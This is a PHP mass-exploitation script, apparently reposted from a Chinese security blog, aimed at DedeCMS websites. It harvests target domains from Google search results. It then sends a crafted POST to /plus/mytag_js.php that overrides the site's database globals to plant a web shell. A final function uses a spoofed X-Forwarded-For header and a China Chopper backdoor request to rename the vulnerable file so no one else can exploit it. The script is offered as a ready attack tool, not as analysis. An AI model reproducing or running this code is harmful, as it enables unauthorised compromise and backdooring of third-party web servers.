
/**漏洞利用**/
function Getshell($url){//下面$content这里需要自己修改一下
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=IP地址&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=数据库用户名&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=数据库密码&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=数据库名称&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";//自己抓包修改
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host \n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
/**返回该页网址列表**/
function ReadgoogleList($keyword,$timeout,$nowpage) 
{
$tmp = array();
$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1\r\nHost:www.google.com.hk\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
preg_match_all("/<cite>(.*?)\//",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
/** 修改漏洞文件的名称防止再次被利用**/
function rname($url){//根据说明填写下
$host=$url;
$port="80";
$content ='';//自己抓包修改 菜刀的包
$data = "POST /plus/你后门地址 HTTP/1.1\r\n";
$data .= "X-Forwarded-For: 199.1.88.29\r\n";
$data .= "Referer: http://$host\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n";
$data .= "Cache-Control: no-cache\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);

if (!$ock) {
echo "[*] No response from $host \r\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>
本文来源于独自等待博客：http://www.waitalone.cn/ 原文地址：http://www.waitalone.cn/post/940.html 


